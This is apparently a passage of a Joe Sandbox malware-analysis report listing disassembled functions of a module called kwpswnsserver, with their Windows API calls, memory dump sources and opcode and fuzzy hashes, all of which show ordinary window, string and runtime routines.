                                                                  • Opcode ID: fc80377799c46a4b83a5d936a619e7e04e93fc052d01fa98cba193d9a00c9b5e
                                                                  • Instruction ID: b3bf430c73909a0438437e8b40f6c679fc6df4872ff98d7fe7429b4e2d0066fe
                                                                  • Opcode Fuzzy Hash: fc80377799c46a4b83a5d936a619e7e04e93fc052d01fa98cba193d9a00c9b5e
                                                                  • Instruction Fuzzy Hash: DF71D835B0061A9FCF099F64CD54A6E7BB9FF89305B104569E81AE7790EB30AD02DF90
                                                                  Function 6C8C842A Relevance: 9.2, APIs: 6, Instructions: 177COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 6C8C8471
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 6C8C84DC
                                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6C8C84F9
                                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 6C8C8538
                                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 6C8C8597
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 6C8C85BA
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiStringWide
                                                                  • String ID:
                                                                  • API String ID: 2829165498-0
                                                                  • Opcode ID: 920718f3efc1168ed26ec2e82ca703ccf077a09a1df64a884d299298d043233c
                                                                  • Instruction ID: 6750b788f65dfe9629655acd3c6e4cb015ff6f57909028fe315d205ddc40e357
                                                                  • Opcode Fuzzy Hash: 920718f3efc1168ed26ec2e82ca703ccf077a09a1df64a884d299298d043233c
                                                                  • Instruction Fuzzy Hash: D651E172B4121AAFEF204F54CD44FAB3BB8EF4474CF21882AF825E6580DBB4C9008B51
                                                                  Function 6C8B0FB6 Relevance: 9.2, APIs: 6, Instructions: 167windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetParent.USER32(00000000), ref: 6C8B1044
                                                                  • SendMessageW.USER32(?,0000040C,00000000,00000000), ref: 6C8B1080
                                                                  • SendMessageW.USER32(00000000,0000041C,00000000,?), ref: 6C8B10B3
                                                                  • SetRectEmpty.USER32(?), ref: 6C8B1119
                                                                  • SendMessageW.USER32(00000000,0000040B,00000000,?), ref: 6C8B1175
                                                                  • RedrawWindow.USER32(00000000,00000000,00000000,00000505), ref: 6C8B11A4
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$EmptyParentRectRedrawWindow
                                                                  • String ID:
                                                                  • API String ID: 3879113052-0
                                                                  • Opcode ID: 4e859cb3a577d2afb15555b12e34613c4c725727281de741c0bd828fb5841c4c
                                                                  • Instruction ID: 685d04c9c8c76599bfce7008eed911601b94f2bcd7529104292847a9058b3dd7
                                                                  • Opcode Fuzzy Hash: 4e859cb3a577d2afb15555b12e34613c4c725727281de741c0bd828fb5841c4c
                                                                  • Instruction Fuzzy Hash: 78517071F016199FDB28DF64C994BADBBB5FF48304F204169E516AB790DB30A901CF80
                                                                  Function 6C8B6394 Relevance: 9.2, APIs: 6, Instructions: 156windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CallNextHookEx.USER32(00000000,?,?), ref: 6C8B63AF
                                                                  • WindowFromPoint.USER32(?,?), ref: 6C8B63D9
                                                                  • ScreenToClient.USER32(00000020,00000200), ref: 6C8B640F
                                                                  • GetParent.USER32(00000020), ref: 6C8B6476
                                                                  • UpdateWindow.USER32(?), ref: 6C8B64DC
                                                                  • SendMessageW.USER32(?,00000100,00000024,00000000), ref: 6C8B655A
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Window$CallClientFromHookMessageNextParentPointScreenSendUpdate
                                                                  • String ID:
                                                                  • API String ID: 4074787488-0
                                                                  • Opcode ID: 0f00ff0d6099f806c8ecd9c16fae8547fd9586c46568107fd03f04b14288ac5c
                                                                  • Instruction ID: 779a30d22402a899e0db0ff095e3316770705ffbad8f80e1c05c487c67a8323c
                                                                  • Opcode Fuzzy Hash: 0f00ff0d6099f806c8ecd9c16fae8547fd9586c46568107fd03f04b14288ac5c
                                                                  • Instruction Fuzzy Hash: FC51D135701306AFDF2C9F58CE44AAA7BB5FF49318F208969E825E7790DB319951CB40
                                                                  Function 6C89254D Relevance: 9.1, APIs: 6, Instructions: 145windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 6C8925D2
                                                                  • IsWindow.USER32(?), ref: 6C89264D
                                                                  • ClientToScreen.USER32(?,?), ref: 6C89265E
                                                                  • IsWindow.USER32(?), ref: 6C89267C
                                                                  • ClientToScreen.USER32(?,?), ref: 6C8926AC
                                                                  • SendMessageW.USER32(?,0000020A,?,?), ref: 6C89270A
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: ClientMessageScreenSendWindow
                                                                  • String ID:
                                                                  • API String ID: 2093367132-0
                                                                  • Opcode ID: 2076ebe697578d5239f0a68c7de1c66bdb791b38cae6637f46aa68cab76f8719
                                                                  • Instruction ID: 6614c4603df77422b0ae80958489e556c8e497386d54e14939da7a6ff7757ec6
                                                                  • Opcode Fuzzy Hash: 2076ebe697578d5239f0a68c7de1c66bdb791b38cae6637f46aa68cab76f8719
                                                                  • Instruction Fuzzy Hash: 3E41C131606206AADB329F7CCF5CB6A7AB5FF06348F204E29E465E2DA5D739D940C710
                                                                  Function 6C8881C8 Relevance: 9.1, APIs: 6, Instructions: 140windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 6C89BA82: GetWindowLongW.USER32(F04D8BF4,000000F0), ref: 6C89BA8F
                                                                  • SendMessageW.USER32(?,0000043D,00000000,00000000), ref: 6C88826E
                                                                  • SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 6C88827F
                                                                  • SendMessageW.USER32(?,0000043C,00000001,00000000), ref: 6C888293
                                                                  • SendMessageW.USER32(?,0000043C,00000000,00000000), ref: 6C8882A4
                                                                  • SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 6C8882B3
                                                                  • InvalidateRect.USER32(?,00000000,00000001,00000000,?,00000000,?,?,?,?,?,?,?,?,?,6C887C50), ref: 6C888346
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$InvalidateLongRectWindow
                                                                  • String ID:
                                                                  • API String ID: 74886174-0
                                                                  • Opcode ID: bf4ef769d31976a2f54236e4dde68e88522eec0958675ceea0a5393dadcb8a5e
                                                                  • Instruction ID: 7578b9aad6f414158c3794075db42fa930fef1d97e03b0bc833f7b1f72f9ba00
                                                                  • Opcode Fuzzy Hash: bf4ef769d31976a2f54236e4dde68e88522eec0958675ceea0a5393dadcb8a5e
                                                                  • Instruction Fuzzy Hash: 7041BA31740229ABDF259F64CC99FEEBB75FF49354F044125FA05AB690EB70A802CB90
                                                                  Function 6C8C8B4C Relevance: 9.1, APIs: 6, Instructions: 131COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FillRect.USER32(?,?,00000000), ref: 6C8C8B8B
                                                                  • GetParent.USER32(?), ref: 6C8C8BAC
                                                                  • GetWindowRect.USER32(?,?), ref: 6C8C8BC9
                                                                  • GetClientRect.USER32(?,?), ref: 6C8C8C6C
                                                                  • MapWindowPoints.USER32(?,?,?,00000002), ref: 6C8C8C7E
                                                                  • DrawThemeBackground.UXTHEME(?,?,00000000,00000000,?,00000000), ref: 6C8C8CA6
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Window$BackgroundClientDrawFillParentPointsTheme
                                                                  • String ID:
                                                                  • API String ID: 2136005349-0
                                                                  • Opcode ID: 80b9309b9f198049fdc4ec9eea1356dc028b00f987503b70398f083fc0d0a06e
                                                                  • Instruction ID: 49fcfdc3150a0f4b1cfdfa224f547c4ecb1459844be35042855da0d2097073da
                                                                  • Opcode Fuzzy Hash: 80b9309b9f198049fdc4ec9eea1356dc028b00f987503b70398f083fc0d0a06e
                                                                  • Instruction Fuzzy Hash: 6C414871A41319DFCB10DF69CE849AE7BB4FF49314B15866AE805E7610E730E941CBA1
                                                                  Function 6C8C2CF2 Relevance: 9.1, APIs: 6, Instructions: 86timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • PtInRect.USER32(?,?,?), ref: 6C8C2D11
                                                                  • ReleaseCapture.USER32 ref: 6C8C2D1F
                                                                  • PtInRect.USER32(?,?,?), ref: 6C8C2D74
                                                                  • InvalidateRect.USER32(?,?,00000001,?,?,?,6C8C1E6F,00000000,00000000,00000000), ref: 6C8C2DDE
                                                                  • SetTimer.USER32(?,0000EC16,00000050,00000000), ref: 6C8C2E02
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$CaptureInvalidateReleaseTimer
                                                                  • String ID:
                                                                  • API String ID: 2903485716-0
                                                                  • Opcode ID: 2d4c27f66ac127563c0382211cdec048fac3ca20adc8fd7422579b3009cb210d
                                                                  • Instruction ID: 125c2f2aeb4359f214ca5494c1bdd866cb8dc1f56f527c109dc73f1849c6101b
                                                                  • Opcode Fuzzy Hash: 2d4c27f66ac127563c0382211cdec048fac3ca20adc8fd7422579b3009cb210d
                                                                  • Instruction Fuzzy Hash: 6931B03130030BEFDF289F24CD48BAABB75FF49316F048625E92992590DB34E421DB91
                                                                  Function 6C896037 Relevance: 9.1, APIs: 6, Instructions: 85windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3_catch.LIBCMT ref: 6C89603E
                                                                  • UnpackDDElParam.USER32(000003E8,?,?,?), ref: 6C896076
                                                                  • GlobalLock.KERNEL32(?), ref: 6C89607E
                                                                  • GlobalUnlock.KERNEL32(?), ref: 6C8960B2
                                                                  • ReuseDDElParam.USER32(?,000003E8,000003E4,00008000,?), ref: 6C8960F5
                                                                  • PostMessageW.USER32(?,000003E4,?,00000000), ref: 6C896101
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: GlobalParam$H_prolog3_catchLockMessagePostReuseUnlockUnpack
                                                                  • String ID:
                                                                  • API String ID: 4045269880-0
                                                                  • Opcode ID: 84eda93bb4f39ed0c968acd132866bf08d12a4750ec7668a3ac12600c9dafd51
                                                                  • Instruction ID: 3e8b8dde1501da7c99f8da0a140bea5185c7ea2cf3399bae5397bee8ca8b22cf
                                                                  • Opcode Fuzzy Hash: 84eda93bb4f39ed0c968acd132866bf08d12a4750ec7668a3ac12600c9dafd51
                                                                  • Instruction Fuzzy Hash: 6A31617090020ADFDF25DF58CE95AFEB775AF14309F104928E511B7690DB709E09CBA0
                                                                  Function 6C89ED7D Relevance: 9.1, APIs: 6, Instructions: 84windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 6C89ED84
                                                                  • CreateRectRgnIndirect.GDI32(00000000), ref: 6C89EDA4
                                                                    • Part of subcall function 6C8838DA: SelectClipRgn.GDI32(?,00000000), ref: 6C8838FA
                                                                    • Part of subcall function 6C8838DA: SelectClipRgn.GDI32(?,00000000), ref: 6C883910
                                                                  • GetParent.USER32(00000000), ref: 6C89EDC4
                                                                  • DrawThemeParentBackground.UXTHEME(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000018), ref: 6C89EDE5
                                                                  • MapWindowPoints.USER32(00000000,?,00000000,00000001), ref: 6C89EE19
                                                                  • SendMessageW.USER32(?,00000014,00000000,00000000), ref: 6C89EE45
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: ClipParentSelect$BackgroundCreateDrawH_prolog3IndirectMessagePointsRectSendThemeWindow
                                                                  • String ID:
                                                                  • API String ID: 935984306-0
                                                                  • Opcode ID: 480965e9141865ce8f2c4a780c53d9b6fd7236d0f55d40f732c11ced24b9edee
                                                                  • Instruction ID: 1e7898980a873c8d5a6591d4b363920ddc2c498ee08831a6fe6299aabfb93690
                                                                  • Opcode Fuzzy Hash: 480965e9141865ce8f2c4a780c53d9b6fd7236d0f55d40f732c11ced24b9edee
                                                                  • Instruction Fuzzy Hash: A8313E71A0021AEFDF21DFA8CD54BEE7BB5BF08705F104824E515A7A60DB35D905CB90
                                                                  Function 6C888B4B Relevance: 9.1, APIs: 6, Instructions: 80windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 6C8A487D
                                                                    • Part of subcall function 6C883E38: __EH_prolog3.LIBCMT ref: 6C883E3F
                                                                    • Part of subcall function 6C883E38: GetWindowDC.USER32(00000000,00000004,6C89E3DA,00000000), ref: 6C883E6B
                                                                  • GetClientRect.USER32(?,?), ref: 6C8A489F
                                                                  • GetWindowRect.USER32(?,?), ref: 6C8A48B3
                                                                    • Part of subcall function 6C883F50: ScreenToClient.USER32(?,6C8993A1), ref: 6C883F5F
                                                                    • Part of subcall function 6C883F50: ScreenToClient.USER32(?,6C8993A9), ref: 6C883F6C
                                                                  • OffsetRect.USER32(?,?,?), ref: 6C8A48D4
                                                                    • Part of subcall function 6C88391D: ExcludeClipRect.GDI32(?,?,?,?,?), ref: 6C883954
                                                                    • Part of subcall function 6C88391D: ExcludeClipRect.GDI32(00000000,?,?,?,?), ref: 6C883971
                                                                  • OffsetRect.USER32(?,?,?), ref: 6C8A48F6
                                                                    • Part of subcall function 6C88397E: IntersectClipRect.GDI32(?,?,?,?,?), ref: 6C8839B5
                                                                    • Part of subcall function 6C88397E: IntersectClipRect.GDI32(00000000,?,?,?,?), ref: 6C8839D2
                                                                  • SendMessageW.USER32(?,00000014,?,00000000), ref: 6C8A492E
                                                                    • Part of subcall function 6C883E8D: ReleaseDC.USER32(?,00000000), ref: 6C883EC1
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Clip$Client$ExcludeIntersectOffsetScreenWindow$H_prolog3H_prolog3_MessageReleaseSend
                                                                  • String ID:
                                                                  • API String ID: 3860140383-0
                                                                  • Opcode ID: 1c6f1c22aabc4ddca12a180ece640c8bd45d962d74654422886797d800f64633
                                                                  • Instruction ID: 336df63938bdcad10a2a2de28a24ed2bbc098c85ab83f18cb6bca93fe499bf1a
                                                                  • Opcode Fuzzy Hash: 1c6f1c22aabc4ddca12a180ece640c8bd45d962d74654422886797d800f64633
                                                                  • Instruction Fuzzy Hash: A031FC72A0021EAFCF19DBA4CD54DFEB779BF59305F144219F506E3650EB24AA05CB60
                                                                  Function 6C90EE05 Relevance: 9.1, APIs: 6, Instructions: 67COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • Concurrency::details::ExternalContextBase::~ExternalContextBase.LIBCONCRT ref: 6C90EE9A
                                                                  • Concurrency::details::ExternalContextBase::~ExternalContextBase.LIBCONCRT ref: 6C90EEB0
                                                                  • Concurrency::details::ExternalContextBase::~ExternalContextBase.LIBCONCRT ref: 6C90EEBB
                                                                  • Concurrency::details::ExternalContextBase::~ExternalContextBase.LIBCONCRT ref: 6C90EEC6
                                                                  • Concurrency::details::ExternalContextBase::~ExternalContextBase.LIBCONCRT ref: 6C90EED1
                                                                  • Concurrency::details::ExternalContextBase::~ExternalContextBase.LIBCONCRT ref: 6C90EEDC
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: ContextExternal$BaseBase::~Concurrency::details::
                                                                  • String ID:
                                                                  • API String ID: 1690591649-0
                                                                  • Opcode ID: 8f15163159b232a196169065eaaf433dc4e9d715f686dadd0057c543a47b01b8
                                                                  • Instruction ID: d28553a520539e2f5f5d77ab8b8aeddbae3913b18ffe18f8a9a718e5272792a5
                                                                  • Opcode Fuzzy Hash: 8f15163159b232a196169065eaaf433dc4e9d715f686dadd0057c543a47b01b8
                                                                  • Instruction Fuzzy Hash: 39217F32300915ABD71CDB68C8A0BEDB779FB61718F40466DD42A47A90EF20A91ACB95
                                                                  Function 6C9D806C Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetLastError.KERNEL32(00000001,?,6C9C28B6,6C8807DB,6C9C1EF5,?,00000007,6CA4F650,00000010,6C9C1F18,?,?,6C9C1FA1,?,00000001,?), ref: 6C9D807A
                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6C9D8088
                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6C9D80A1
                                                                  • SetLastError.KERNEL32(00000000,00000007,6CA4F650,00000010,6C9C1F18,?,?,6C9C1FA1,?,00000001,?,?,00000001,?,6CA4F678,0000000C), ref: 6C9D80F3
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastValue___vcrt_
                                                                  • String ID:
                                                                  • API String ID: 3852720340-0
                                                                  • Opcode ID: 61336d290a36d988d9de5819971cde883f4723b30e2a9ac93902e03256a96baa
